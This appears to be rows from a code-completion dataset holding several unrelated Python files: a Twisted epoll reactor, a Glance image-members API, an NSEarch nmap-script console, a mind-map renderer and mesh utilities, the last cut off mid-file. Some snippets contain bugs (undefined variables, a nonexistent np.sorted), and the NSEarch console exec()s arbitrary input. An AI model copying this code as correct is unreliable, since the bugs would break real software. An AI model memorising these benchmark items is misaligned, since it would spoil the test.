gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
An epoll() based implementation of the twisted main loop.
To install the event loop (and you should do this before any connections,
listeners or connectors are added)::
from twisted.internet import epollreactor
epollreactor.install()
Maintainer: Jp Calderone
"""
import sys, errno
from zope.interface import implements
from twisted.internet.interfaces import IReactorFDSet
from twisted.python import _epoll
from twisted.python import log
from twisted.internet import posixbase, error
from twisted.internet.main import CONNECTION_LOST
_POLL_DISCONNECTED = (_epoll.HUP | _epoll.ERR)
class EPollReactor(posixbase.PosixReactorBase):
"""
A reactor that uses epoll(4).
@ivar _poller: A L{poll} which will be used to check for I/O
readiness.
@ivar _selectables: A dictionary mapping integer file descriptors to
instances of L{FileDescriptor} which have been registered with the
reactor. All L{FileDescriptors} which are currently receiving read or
write readiness notifications will be present as values in this
dictionary.
@ivar _reads: A dictionary mapping integer file descriptors to arbitrary
values (this is essentially a set). Keys in this dictionary will be
registered with C{_poller} for read readiness notifications which will
be dispatched to the corresponding L{FileDescriptor} instances in
C{_selectables}.
@ivar _writes: A dictionary mapping integer file descriptors to arbitrary
values (this is essentially a set). Keys in this dictionary will be
registered with C{_poller} for write readiness notifications which will
be dispatched to the corresponding L{FileDescriptor} instances in
C{_selectables}.
"""
implements(IReactorFDSet)
def __init__(self):
"""
Initialize epoll object, file descriptor tracking dictionaries, and the
base class.
"""
# Create the poller we're going to use. The 1024 here is just a hint
# to the kernel, it is not a hard maximum.
self._poller = _epoll.epoll(1024)
self._reads = {}
self._writes = {}
self._selectables = {}
posixbase.PosixReactorBase.__init__(self)
def _add(self, xer, primary, other, selectables, event, antievent):
"""
Private method for adding a descriptor from the event loop.
It takes care of adding it if new or modifying it if already added
for another state (read -> read/write for example).
"""
fd = xer.fileno()
if fd not in primary:
cmd = _epoll.CTL_ADD
flags = event
if fd in other:
flags |= antievent
cmd = _epoll.CTL_MOD
primary[fd] = 1
selectables[fd] = xer
# epoll_ctl can raise all kinds of IOErrors, and every one
# indicates a bug either in the reactor or application-code.
# Let them all through so someone sees a traceback and fixes
# something. We'll do the same thing for every other call to
# this method in this file.
self._poller._control(cmd, fd, flags)
def addReader(self, reader):
"""
Add a FileDescriptor for notification of data available to read.
"""
self._add(reader, self._reads, self._writes, self._selectables, _epoll.IN, _epoll.OUT)
def addWriter(self, writer):
"""
Add a FileDescriptor for notification of data available to write.
"""
self._add(writer, self._writes, self._reads, self._selectables, _epoll.OUT, _epoll.IN)
def _remove(self, xer, primary, other, selectables, event, antievent):
"""
Private method for removing a descriptor from the event loop.
It does the inverse job of _add, and also add a check in case of the fd
has gone away.
"""
fd = xer.fileno()
if fd == -1:
for fd, fdes in selectables.items():
if xer is fdes:
break
else:
return
if fd in primary:
cmd = _epoll.CTL_DEL
flags = event
if fd in other:
flags = antievent
cmd = _epoll.CTL_MOD
else:
del selectables[fd]
del primary[fd]
# See comment above _control call in _add.
self._poller._control(cmd, fd, flags)
def removeReader(self, reader):
"""
Remove a Selectable for notification of data available to read.
"""
self._remove(reader, self._reads, self._writes, self._selectables, _epoll.IN, _epoll.OUT)
def removeWriter(self, writer):
"""
Remove a Selectable for notification of data available to write.
"""
self._remove(writer, self._writes, self._reads, self._selectables, _epoll.OUT, _epoll.IN)
def removeAll(self):
"""
Remove all selectables, and return a list of them.
"""
if self.waker is not None:
fd = self.waker.fileno()
if fd in self._reads:
del self._reads[fd]
del self._selectables[fd]
result = self._selectables.values()
fds = self._selectables.keys()
self._reads.clear()
self._writes.clear()
self._selectables.clear()
for fd in fds:
try:
# Actually, we'll ignore all errors from this, since it's
# just last-chance cleanup.
self._poller._control(_epoll.CTL_DEL, fd, 0)
except IOError:
pass
if self.waker is not None:
fd = self.waker.fileno()
self._reads[fd] = 1
self._selectables[fd] = self.waker
return result
def getReaders(self):
return [self._selectables[fd] for fd in self._reads]
def getWriters(self):
return [self._selectables[fd] for fd in self._writes]
def doPoll(self, timeout):
"""
Poll the poller for new events.
"""
if timeout is None:
timeout = 1
timeout = int(timeout * 1000) # convert seconds to milliseconds
try:
# Limit the number of events to the number of io objects we're
# currently tracking (because that's maybe a good heuristic) and
# the amount of time we block to the value specified by our
# caller.
l = self._poller.wait(len(self._selectables), timeout)
except IOError, err:
if err.errno == errno.EINTR:
return
# See epoll_wait(2) for documentation on the other conditions
# under which this can fail. They can only be due to a serious
# programming error on our part, so let's just announce them
# loudly.
raise
_drdw = self._doReadOrWrite
for fd, event in l:
try:
selectable = self._selectables[fd]
except KeyError:
pass
else:
log.callWithLogger(selectable, _drdw, selectable, fd, event)
doIteration = doPoll
def _doReadOrWrite(self, selectable, fd, event):
"""
fd is available for read or write, make the work and raise errors
if necessary.
"""
why = None
inRead = False
if event & _POLL_DISCONNECTED and not (event & _epoll.IN):
why = CONNECTION_LOST
else:
try:
if event & _epoll.IN:
why = selectable.doRead()
inRead = True
if not why and event & _epoll.OUT:
why = selectable.doWrite()
inRead = False
if selectable.fileno() != fd:
why = error.ConnectionFdescWentAway(
'Filedescriptor went away')
inRead = False
except:
log.err()
why = sys.exc_info()[1]
if why:
self._disconnectSelectable(selectable, why, inRead)
def install():
"""
Install the epoll() reactor.
"""
p = EPollReactor()
from twisted.internet.main import installReactor
installReactor(p)
__all__ = ["EPollReactor", "install"]
|
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
import webob
from glance.api import policy
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
import glance.db
import glance.domain
import glance.gateway
import glance.notifier
from glance.openstack.common import timeutils
import glance.schema
import glance.store
class ImageMembersController(object):
def __init__(self, db_api=None, policy_enforcer=None, notifier=None,
store_api=None):
self.db_api = db_api or glance.db.get_api()
self.db_api.setup_db_env()
self.policy = policy_enforcer or policy.Enforcer()
self.notifier = notifier or glance.notifier.Notifier()
self.store_api = store_api or glance.store
self.gateway = glance.gateway.Gateway(self.db_api, self.store_api,
self.notifier, self.policy)
@utils.mutating
def create(self, req, image_id, member_id):
"""
Adds a membership to the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
image_member_factory = self.gateway\
.get_image_member_factory(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
new_member = image_member_factory.new_image_member(image,
member_id)
member = member_repo.add(new_member)
return member
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
except exception.Duplicate as e:
raise webob.exc.HTTPConflict(explanation=unicode(e))
@utils.mutating
def update(self, req, image_id, member_id, status):
"""
Adds a membership to the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member.status = status
member = member_repo.save(member)
return member
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
except ValueError as e:
raise webob.exc.HTTPBadRequest(explanation=unicode(e))
def index(self, req, image_id):
"""
Return a list of dictionaries indicating the members of the
image, i.e., those tenants the image is shared with.
:param req: the Request object coming from the wsgi layer
:param image_id: The image identifier
:retval The response body is a mapping of the following form::
{'members': [
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}, ..
]}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
members = []
for member in member_repo.list():
members.append(member)
return dict(members=members)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
@utils.mutating
def delete(self, req, image_id, member_id):
"""
Removes a membership from the image.
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member_repo.remove(member)
return webob.Response(body='', status=204)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
class RequestDeserializer(wsgi.JSONRequestDeserializer):
def __init__(self):
super(RequestDeserializer, self).__init__()
def _get_request_body(self, request):
output = super(RequestDeserializer, self).default(request)
if 'body' not in output:
msg = _('Body expected in request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
return output['body']
def create(self, request):
body = self._get_request_body(request)
try:
member_id = body['member']
if not member_id:
raise ValueError()
except KeyError:
msg = _("Member to be added not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
except ValueError:
msg = _("Member can't be empty")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(member_id=member_id)
def update(self, request):
body = self._get_request_body(request)
try:
status = body['status']
except KeyError:
msg = _("Status not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(status=status)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
super(ResponseSerializer, self).__init__()
self.schema = schema or get_schema()
def _format_image_member(self, member):
member_view = {}
attributes = ['member_id', 'image_id', 'status']
for key in attributes:
member_view[key] = getattr(member, key)
member_view['created_at'] = timeutils.isotime(member.created_at)
member_view['updated_at'] = timeutils.isotime(member.updated_at)
member_view['schema'] = '/v2/schemas/member'
member_view = self.schema.filter(member_view)
return member_view
def create(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = json.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = unicode(body)
response.content_type = 'application/json'
def update(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = json.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = unicode(body)
response.content_type = 'application/json'
def index(self, response, image_members):
image_members = image_members['members']
image_members_view = []
for image_member in image_members:
image_member_view = self._format_image_member(image_member)
image_members_view.append(image_member_view)
totalview = dict(members=image_members_view)
totalview['schema'] = '/v2/schemas/members'
body = json.dumps(totalview, ensure_ascii=False)
response.unicode_body = unicode(body)
response.content_type = 'application/json'
_MEMBER_SCHEMA = {
'member_id': {
'type': 'string',
'description': _('An identifier for the image member (tenantId)')
},
'image_id': {
'type': 'string',
'description': _('An identifier for the image'),
'pattern': ('^([0-9a-fA-F]){8}-([0-9a-fA-F]){4}-([0-9a-fA-F]){4}'
'-([0-9a-fA-F]){4}-([0-9a-fA-F]){12}$'),
},
'created_at': {
'type': 'string',
'description': _('Date and time of image member creation'),
#TODO(brian-rosmaita): our jsonschema library doesn't seem to like the
# format attribute, figure out why (and also fix in images.py)
#'format': 'date-time',
},
'updated_at': {
'type': 'string',
'description': _('Date and time of last modification of image member'),
#'format': 'date-time',
},
'status': {
'type': 'string',
'description': _('The status of this image member'),
'enum': [
'pending',
'accepted',
'rejected'
]
},
'schema': {'type': 'string'}
}
def get_schema():
properties = copy.deepcopy(_MEMBER_SCHEMA)
schema = glance.schema.Schema('member', properties)
return schema
def get_collection_schema():
member_schema = get_schema()
return glance.schema.CollectionSchema('members', member_schema)
def create_resource():
"""Image Members resource factory method"""
deserializer = RequestDeserializer()
serializer = ResponseSerializer()
controller = ImageMembersController()
return wsgi.Resource(controller, deserializer, serializer)
|
|
## console.py
import cmd
import helper
import helpernmap
import os
import readline
from helper import *
banner ='\033[0;36m'+'''
================================================
_ _ _____ _____ _
| \ | |/ ___|| ___| | |
| \| |\ `--. | |__ __ _ _ __ ___ | |__
| . ` | `--. \| __| / _` || '__| / __|| '_ |
| |\ |/\__/ /| |___ | (_| || | | (__ | | | |
\_| \_/\____/ \____/ \__,_||_| \___||_| |_|
================================================
Version 0.4b http://goo.gl/8mFHE5 @jjtibaquira
Email: [email protected] | www.dragonjar.org
================================================
'''+'\033[0m'
class Console(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.prompt = "nsearch> "
self.intro = banner
self.doc_header = i18n.t("help.doc_header")
self.misc_header = i18n.t("help.misc_header")
self.undoc_header = i18n.t("help.undoc_header")
self.ruler = '='
## autocomplete definition list
serachCommands = [ 'name', 'category', 'help', 'author']
showfavOptions = ['name', 'ranking', 'help']
## Command definitions ##
def do_history(self, args):
"""Print a list of commands that have been entered"""
print self._history
def do_exit(self, args):
"""Exits from the console"""
return -1
def do_help(self, args):
"""Get help on commands
'help' or '?' with no arguments prints a list of commands for which help is available
'help <command>' or '? <command>' gives help on <command>
"""
## The only reason to define this method is for the help text in the doc string
cmd.Cmd.do_help(self, args)
## Command definitions to support Cmd object functionality ##
def do_EOF(self, args):
"""Exit on system end of file character"""
return self.do_exit(args)
## Override methods in Cmd object ##
def preloop(self):
"""Initialization before prompting user for commands.
Despite the claims in the Cmd documentaion, Cmd.preloop() is not a stub.
"""
cmd.Cmd.preloop(self) ## sets up command completion
self._history = "" ## No historyory yet
self._locals = {} ## Initialize execution namespace for user
self._globals = {}
old_delims = readline.get_completer_delims()
readline.set_completer_delims(old_delims.replace('-', ''))
def postloop(self):
"""Take care of any unfinished business.
Despite the claims in the Cmd documentaion, Cmd.postloop() is not a stub.
"""
cmd.Cmd.postloop(self) ## Clean up command completion
print '\033[0;36m Closing NSEarch ... :D\033[0m'
def precmd(self, line):
""" This method is called after the line has been input but before
it has been interpreted. If you want to modifdy the input line
before execution (for example, variable substitution) do it here.
"""
self._history += line.strip()+"\n"
return line
def postcmd(self, stop, line):
"""If you want to stop the console, return something that evaluates to true.
If you want to do some post command processing, do it here.
"""
return stop
def emptyline(self):
"""Do nothing on empty input line"""
pass
def do_clear(self, args):
""" Clear the shell """
os.system("clear")
print self.intro
def do_search(self, args):
""" Search """
search = helper.Helper(args,"search")
search.process()
def complete_search(self, text, line, begidx, endidx):
if not text:
commands = self.serachCommands[:]
else:
commands = [ f
for f in self.serachCommands
if f.startswith(text)
]
return commands
def help_search(self):
print '\n'.join([ "\n\tname : "+i18n.t("help.help_search_name")+"",
"\tcategory : "+i18n.t("help.help_search_category")+"",
"\tauthor : "+i18n.t("help.help_search_author")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tsearch name:http',
'\t\tsearch category:exploit',
'\t\tsearch author:fyodor',
'\t\tsearch name:http category:exploit author:fyodor'])
def do_doc(self, args):
""" Display Script Documentaion"""
doc = helper.Helper(args)
doc.displayDoc()
def help_doc(self):
print "\t"+i18n.t("help.help_doc")
print "\t"+i18n.t("help.help_usage")
print "\t\t"+i18n.t("help.help_doc_exmp")
def complete_doc(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_last(self,args):
""" last help"""
try:
search = helper.Helper()
search.printlastResult()
except Exception, e:
os.system("clear")
print self.intro
search = helper.Helper(args,"showfav")
search.process()
def help_last(self):
print i18n.t("help.help_last")
# handler fav actions
def do_addfav(self,args):
search = helper.Helper(args,"addfav")
search.process()
def help_addfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_addfav")+"",
"\tname : "+i18n.t("help.help_fav_name")+"",
"\tranking : "+i18n.t("help.help_fav_ranking")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\taddfav name:http ranking:great'])
def complete_addfav(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_delfav(self,args):
search = helper.Helper(args,"delfav")
search.process()
def help_delfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_delfav")+"",
"\tname : "+i18n.t("help.help_fav_name")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tdelfav name:http'])
def complete_delfav(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_modfav(self,args):
search = helper.Helper(args,"modfav")
search.process()
def help_modfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_modfav")+"",
"\tname : "+i18n.t("help.help_search_name")+"",
"\tnewname : "+i18n.t("help.help_fav_name")+"",
"\tnewranking : "+i18n.t("help.help_fav_ranking")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tmodfav name:http newname:http-new-script newranking:super-great'])
def complete_modfav(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_showfav(self,args):
search = helper.Helper(args,"showfav")
search.process()
def help_showfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_showfav")+"",
"\tname : "+i18n.t("help.help_fav_name")+"",
"\tranking : "+i18n.t("help.help_fav_ranking")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tshowfav name:http',
'\t\tshowfav ranking:great',
'\t\tshowfav name:http ranking:great'])
def complete_showfav(self, text, line, begidx, endidx):
if not text:
commands = self.showfavOptions[:]
else:
commands = [ f
for f in self.showfavOptions
if f.startswith(text)
]
return commands
def do_run(self, args):
''' Command to run templetes '''
nmap = helpernmap.HelperNmap(args)
nmap.process()
def help_run(self):
print '\n'.join([
"\t"+i18n.t("help.help_run")+"",
"\tnet : "+i18n.t("help.help_run_net")+"",
"\ttemplate : "+i18n.t("help.help_run_template")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\trun template:http net:target'])
#default action cmd class
def default(self, line):
"""Called on an input line when the command prefix is not recognized.
In that case we execute the line as Python code.
"""
try:
exec(line) in self._locals, self._globals
except Exception, e:
print e.__class__, ":", e
|
|
# Meme: a fast mind-mapping tool
# (c) 2010 Jamie Webb - MIT license
import math, sys, pygtk, gtk, pango, cairo, random, time
class Renderer(object):
def __init__(self, style, canvas, window, w, h):
self._style = style
self._canvas = canvas
self._window = window
self._zoom = 1
self._pixmap = self._make_pixmap(w, h)
self._ctx = self._pixmap.cairo_create()
self.clear(0, 0, w, h)
self._top_arc = self._make_arc("top")
self._middle_arc = self._make_arc("middle")
self._bottom_arc = self._make_arc("bottom")
def _make_pixmap(self, w, h):
return gtk.gdk.Pixmap(self._window, w, h)
def _make_arc(self, t):
style = self._style
pix = self._make_pixmap(self._style.padx, self._style.dimy)
ctx = pix.cairo_create()
ctx.set_source_rgb(*style.background)
ctx.paint()
ctx.set_source_rgb(*style.lines)
ctx.set_line_width(style.line_width)
rx = style.padx / 2.0
ry = (style.pady + style.dimy) / 4.0
r = rx if rx < ry else ry
px2 = style.padx / 2.0
cy = style.dimy / 2.0
if t == "top":
ctx.arc(px2 + r, cy + r, r, math.pi, math.pi * 1.5)
ctx.stroke()
ctx.move_to(px2 + r, cy)
ctx.line_to(style.padx, cy)
ctx.stroke()
ctx.move_to(px2, cy + r)
ctx.line_to(px2, style.dimy)
ctx.stroke()
if t == "middle":
ctx.arc(px2 - r, cy - r, r, 0, math.pi * 0.5)
ctx.stroke()
ctx.arc(px2 - r, cy + r, r, -math.pi * 0.5, 0)
ctx.stroke()
ctx.move_to(0, cy)
ctx.rel_line_to(px2 - r, 0)
ctx.stroke()
if t == "bottom":
ctx.arc(px2 + r, cy - r, r, math.pi * 0.5, math.pi)
ctx.stroke()
ctx.move_to(px2 + r, cy)
ctx.line_to(style.padx, cy)
ctx.stroke()
ctx.move_to(px2, cy - r)
ctx.line_to(px2, 0)
ctx.stroke()
return pix
def clear_all(self, color = None):
ctx = self._ctx
ctx.set_source_rgb(*(color or self._style.background))
ctx.paint()
w, h = self._pixmap.get_size()
self.redraw(0, 0, w, h)
def clear(self, left, top, width, height, color = None):
ctx = self._ctx
ctx.set_source_rgb(*(color or self._style.background))
ctx.rectangle(left, top, width, height)
ctx.fill()
def xgap(self, left, top, width, height, delta):
self.resize(left + width + delta, 0)
self._pixmap.draw_drawable(self._pixmap.new_gc(), self._pixmap, left, top, left + delta, top, width, height)
if delta < 0:
self.clear(left + width + delta, top, abs(delta), height)
def ygap(self, width, height, top, delta):
width += self._style.marginx * 2
height += self._style.marginy
self.resize(width, height)
self._pixmap.draw_drawable(self._pixmap.new_gc(), self._pixmap, 0, top, 0, top + delta, width, height - delta)
if delta > 0:
self.clear(0, top, width, delta)
elif delta < 0:
self.clear(0, height + delta, width, -delta)
def viewport(self, width, height):
self._canvas.set_size_request(width + self._style.marginx * 2 - self._style.padx,
height + self._style.marginy * 2)
def draw_label(self, node, peer, x, y, cy, dimy2, style):
lo = self._make_layout(node.title)
tw, th = lo.get_pixel_size()
ctx.set_antialias(cairo.ANTIALIAS_NONE)
ctx.rectangle(x + 1, cy - dimy2 + 1, peer.inner_width - 1, style.dimy - 1)
if current:
ctx.set_source_rgb(1, 1, 0)
else:
ctx.set_source_rgb(*style.colors[node.color][1])
ctx.fill_preserve()
ctx.set_line_width(1.0)
ctx.set_source_rgb(*style.colors[node.color][0])
ctx.stroke()
ctx.move_to(x + style.innerpad, cy - dimy2 + th / 3.0)
ctx.show_layout(lo)
def draw_label_alt(self, ctx, node, peer, x, y, cy, dimy2, style, current):
lo = self._make_layout(node.title)
tw, th = lo.get_pixel_size()
if current:
ctx.set_antialias(cairo.ANTIALIAS_NONE)
ctx.rectangle(x + 1, cy - dimy2 + 1, peer.inner_width - 1, style.dimy - 1)
ctx.set_source_rgb(*style.colors[0][1])
ctx.fill_preserve()
ctx.set_line_width(1.0)
ctx.set_source_rgb(*style.colors[0][0])
ctx.stroke()
ctx.set_source_rgb(*style.colors[node.color][0])
ctx.move_to(x + style.innerpad, cy - dimy2 + th / 3.0)
ctx.show_layout(lo)
def draw_node(self, node, peer, x, y, current):
ctx = self._ctx
style = self._style
gc = self._pixmap.new_gc()
#ctx.scale(self._zoom, self._zoom)
width = peer.outer_width
height = peer.total_height
cy = int(y + height / 2.0 + 0.5)
dimy2 = int(style.dimy / 2.0 + 0.5)
dimx = peer.inner_width
self.clear(x, y, width, height)
self._canvas.queue_draw_area(x, y, width, height)
ctx.save()
self.draw_label_alt(ctx, node, peer, x, y, cy, dimy2, style, current)
ctx.restore()
n = node.count_children()
if n == 0:
return
ctx.set_line_width(style.line_width)
ctx.set_source_rgb(*style.lines)
rx = style.padx / 2.0
sp = style.dimy + style.pady
ry = sp / 4.0
r = rx if rx < ry else ry
px2 = style.padx / 2.0
pos = 0
i = 0
topline = None
bottomline = None
hline = False
for cp in peer.children():
height = cp.total_height
ccx = x + dimx + style.padx
ccy = int(y + pos + height / 2.0 + 0.5)
if i == 0:
topline = int(ccy - cy + 0.5)
elif i == n - 1:
bottomline = int(ccy - cy + 0.5)
if ccy < cy:
if i != 0:
self._pixmap.draw_drawable(gc, self._top_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
elif ccy > cy:
if i != n - 1:
self._pixmap.draw_drawable(gc, self._bottom_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
else:
hline = True
pos += height
i += 1
if n > 1:
ctx.move_to(x + dimx + px2, cy)
ctx.rel_line_to(0, topline)
ctx.stroke()
ctx.move_to(x + dimx + px2, cy)
ctx.rel_line_to(0, bottomline)
ctx.stroke()
if n == 1:
ctx.move_to(x + dimx, cy)
ctx.rel_line_to(px2 - r, 0)
ctx.stroke()
i = 0
pos = 0
for cp in peer.children():
height = cp.total_height
ccx = x + dimx + style.padx
ccy = int(y + pos + height / 2.0 + 0.5)
if i == 0 and ccy < cy:
self._pixmap.draw_drawable(gc, self._top_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
elif i == n - 1 and ccy > cy:
self._pixmap.draw_drawable(gc, self._bottom_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
pos += height
i += 1
if n != 1:
self._pixmap.draw_drawable(gc, self._middle_arc, 0,
int(dimy2 - r + 0.5), x + dimx, int(cy - r + 0.5),
style.padx, int(r * 2.0 - 0.5))
if hline:
ctx.move_to(x + dimx + px2 - r, cy)
ctx.line_to(x + dimx + style.padx, cy)
ctx.stroke()
def _make_layout(self, title):
lo = self._ctx.create_layout()
lo.set_font_description(pango.FontDescription(self._style.font))
lo.set_text(title)
return lo
def text_width(self, title):
lo = self._make_layout(title)
tw, th = lo.get_pixel_size()
return tw
def resize(self, w, h):
# Round up so we don't have to do this so often
w = (w / 200 + 1) * 200
h = (h / 200 + 1) * 200
old = self._pixmap
ow, oh = old.get_size()
if w > ow or h > oh:
self._pixmap = self._make_pixmap(max(ow, w), max(oh, h))
self._ctx = self._pixmap.cairo_create()
self._pixmap.draw_drawable(self._pixmap.new_gc(), old, 0, 0, 0, 0, ow, oh)
if w > ow:
self.clear(ow, 0, w - ow, oh)
if h > oh:
self.clear(0, oh, max(ow, w), h - oh)
def redraw(self, left, top, width, height):
gc = self._pixmap.new_gc()
self._window.draw_drawable(gc, self._pixmap, left, top, left, top, width, height)
# vim:sw=4 ts=4
|
|
from __future__ import print_function
import os
import subprocess,os.path
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Circle
from matplotlib.collections import LineCollection
from shapely import geometry
from . import field
from ..utils import point_in_polygon
def plot_geo(geo):
def plot_ring(r):
points = np.array(r.coords)
plt.plot( points[:,0],points[:,1],'k' )
plot_ring(geo.exterior)
for r in geo.interiors:
plot_ring(r)
def geo2poly(geo_poly,poly_filename):
"""
given a polygon geometry, write a triangle compatible poly
file
"""
print("Writing poly file ", poly_filename)
# and then only the exterior ring:
point_list = np.array(geo_poly.exterior.coords)
# which at least sometimes has a duplicate node at the end that
# we don't want
if np.all(point_list[0]==point_list[-1]):
point_list = point_list[:-1]
npoints = point_list.shape[0]
# triangle wants the basic planar-straight-line-graph
poly_fp = open(poly_filename,'wt')
# first line is
# First line: <# of vertices> <dimension (must be 2)> <# of attributes> <# of boundary markers (0 or 1)>
poly_fp.write("%i 2 0 0\n"%(npoints))
# Write out vertices
for i in range(npoints):
# <vertex #> <x> <y> [attributes] [boundary marker]
poly_fp.write("%i %f %f\n"%(i,point_list[i,0],point_list[i,1]))
# Write out segments
# <# of segments> <# of boundary markers (0 or 1)>
poly_fp.write("%i 0\n"%(npoints))
for i in range(npoints):
# <segment #> <endpoint> <endpoint> [boundary marker]
poly_fp.write("%i %i %i\n"%(i,i,(i+1)%npoints))
# number of holes, which for the moment we ignore:
poly_fp.write("0\n")
poly_fp.close()
def load_triangle_nodes(node_filename):
"""
load nodes as output by triangle
"""
fp = open(node_filename,'rt')
n_nodes, dim, nattrs, has_boundary_markers = map(int,fp.readline().split())
nodes = np.zeros( (n_nodes,dim), np.float64)
for i in range(n_nodes):
idx,nodes[i,0],nodes[i,1] = map(float,fp.readline().split()[:3])
fp.close()
return nodes
def load_triangle_edges(edge_filename):
""" load finite edges from output from triangle
"""
fp = open(edge_filename,'rt')
n_edges,n_markers = map(int,fp.readline().split())
# indexed into corresponding node file:
edges = []
for i in range(n_edges):
vals=map(int,fp.readline().split()[:3])
if vals[2] == -1:
continue # it's a ray
edges.append( vals[1:3] )
fp.close()
return np.array(edges)
def plot_voronoi(poly_filename):
vor_node = poly_file.replace('.poly','.1.v.node')
vor_edge = poly_file.replace('.poly','.1.v.edge')
# load the vor nodes and show them:
vor_nodes = load_triangle_nodes(vor_node)
plt.plot(vor_nodes[:,0],vor_nodes[:,1],'r+')
vor_edges = load_triangle_edges(vor_edge)
# plot the finite edges:
# build up the list of lines:
all_lines = vor_nodes[vor_edges]
coll = LineCollection(all_lines)
ax = plt.gca()
ax.add_collection(coll)
def load_triangle_elements(ele_file):
fp = open(ele_file,'rt')
n_elts, nodes_per_elt, n_attrs = map(int,fp.readline().split())
tris = np.zeros( (n_elts,3), np.int32)
for i in range(n_elts):
dummy, tris[i,0],tris[i,1],tris[i,2] = map(int,fp.readline().split()[:4])
return tris
def plot_elements(tris,nodes):
edges = set()
for t in range(tris.shape[0]):
t_verts = np.sorted(tris[t])
edges.add( (t_verts[0],t_verts[1]) )
edges.add( (t_verts[0],t_verts[2]) )
edges.add( (t_verts[1],t_verts[2]) )
edges = np.array(list(edges))
all_lines = nodes[edges]
coll = LineCollection(all_lines)
ax = plt.gca()
ax.add_collection(coll)
# that writes out these files:
# node_file = poly_file.replace('.poly','.1.node')
# element_file = poly_file.replace('.poly','.1.ele')
# tris = load_triangle_elements(element_file)
# nodes = load_triangle_nodes(node_file)
# plot_elements(tris,nodes)
# Look into how to compute the local radius based on the voronoi
# diagram:
# Find the radius at each voronoi center:
# 1. load the voronoi nodes:
# some sort of issue loading the tri information - might be worth
# trying it w/o any islands, but first taking a look...
# nodes: 2-D, 0 attributes, 1 boundary marker
# 8690 nodes (compare to 8003 nodes in input)
class Graph(object):
def __init__(self,basename):
node_file = basename + '.node'
if os.path.exists(node_file):
self.nodes = load_triangle_nodes(node_file)
else:
self.nodes = None
edge_file = basename + '.edge'
if os.path.exists(edge_file):
self.edges = load_triangle_edges(edge_file)
else:
self.edges = None
element_file = basename + '.ele'
if os.path.exists(element_file):
